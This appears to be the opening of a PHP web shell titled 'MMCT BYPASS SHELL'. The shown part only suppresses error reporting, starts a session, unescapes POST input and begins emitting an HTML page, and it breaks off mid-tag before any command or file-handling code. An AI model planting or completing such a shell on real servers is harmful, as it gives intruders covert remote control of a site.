<?php
error_reporting(0);
session_start();
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<html>
<head>
<title>MMCT BYPASS SHELL</title>
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab"